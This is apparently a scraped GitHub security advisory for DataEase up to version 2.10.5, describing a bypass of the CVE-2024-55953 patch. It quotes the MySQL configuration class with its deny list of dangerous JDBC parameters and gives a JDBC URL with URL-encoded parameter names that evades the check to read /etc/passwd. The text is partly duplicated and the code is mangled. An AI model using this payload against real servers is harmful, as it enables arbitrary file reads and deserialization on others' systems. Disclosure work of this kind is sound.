Impact
Re-bypass for the patch for CVE-2024-55953.
Authenticated users can read and deserialize arbitrary files through the background JDBC connection.
The code in question is as follows (io.dataease.dto.datasource.MysqlConfiguration):
package io.dataease.datasource.type;
import io.dataease.exception.DEException;
import io.dataease.extensions.datasource.vo.DatasourceConfiguration;
import lombok.Data;
import org.apache.commons.lang3.StringUtils;
import org.springframework.stereotype.Component;
import java.net.URLDecoder;
import java.util.Arrays;
import java.util.List;@
Data@ Component("mysql")
public class Mysql extends DatasourceConfiguration {
private String driver = "com.mysql.cj.jdbc.Driver";
private String extraParams = "characterEncoding=UTF-
8 & connectTimeout = 5000 & useSSL = false & allowPublicKeyRetrieval = true & zeroDateTimeBehavior = convertToNull ";
private List < String > illegalParameters =
Arrays.asList("maxAllowedPacket", "autoDeserialize", "queryInterceptors",
"statementInterceptors", "detectCustomCollations", "allowloadlocalinfile", "allowUrlInLocalInfile", "allowLoadLocalInfileInPath");
private List < String > showTableSqls = Arrays.asList("show tables");
public String getJdbc() {
if (StringUtils.isNoneEmpty(getUrlType()) &&
!getUrlType().equalsIgnoreCase("hostName")) {
for (String illegalParameter: illegalParameters) {
if (getJdbcUrl().toLowerCase().contains(illegalParameter.toLowerCase()) || URLDecoder.decode(getExtraParams()).contains(illegalParameter.toLowerCase())) {
DEException.throwException("Illegal parameter: " +
illegalParameter);
}
}
return getJdbcUrl();
}
if (StringUtils.isEmpty(extraParams.trim())) {
return "jdbc:mysql://HOSTNAME:PORT/DATABASE"
.replace("HOSTNAME", getLHost().trim())
.replace("PORT", getLPort().toString().trim())
.replace("DATABASE", getDataBase().trim());
} else {
for (String illegalParameter: illegalParameters) {
if (getExtraParams().toLowerCase().contains(illegalParameter.toLowerCase()) || URLDecoder.decode(getExtraParams()).contains(illegalParameter.toLowerCase())) {
DEException.throwException("Illegal parameter: " +
illegalParameter);
}
}
return "jdbc:mysql://HOSTNAME:PORT/DATABASE?EXTRA_PARAMS"
.replace("HOSTNAME", getLHost().trim())
.replace("PORT", getLPort().toString().trim())
.replace("DATABASE", getDataBase().trim())
.replace("EXTRA_PARAMS", getExtraParams().trim());
}
}
}The JDBC connection string returned by getJdbcurl function is not URLDecoded, resulting in the following JDBC string being constructed to bypass it
jdbc:mysql://192.168.64.1:3306/?
%61%6c%6c%6f%77%4c%6f%61%64%4c%6f%63%61%6c%49%6e%66%69%6c%65=true&%61%6c%6c%6f
%77%55%72%6c%49%6e%4c%6f%63%61%6c%49%6e%66%69%6c%65=true
After logging in, send the following request
It can be seen that the detection is bypassed at the source code
Using the tool , successfully read the /etc/passwd
Affected versions: <= 2.10.5
Patches
The vulnerability has been fixed in v2.10.6.
Workarounds
It is recommended to upgrade the version to v2.10.6.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease
Email us at [email protected]
N1etzsche0 Analyst
yulate Coordinator
h3h3qaq Coordinator
Impact
Re-bypass for the patch for CVE-2024-55953.
Authenticated users can read and deserialize arbitrary files through the background JDBC connection.
The code in question is as follows (io.dataease.dto.datasource.MysqlConfiguration):
The JDBC connection string returned by getJdbcurl function is not URLDecoded, resulting in the following JDBC string being constructed to bypass it
After logging in, send the following request
It can be seen that the detection is bypassed at the source code
Using the tool , successfully read the /etc/passwd
Affected versions: <= 2.10.5
Patches
The vulnerability has been fixed in v2.10.6.
Workarounds
It is recommended to upgrade the version to v2.10.6.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease
Email us at [email protected]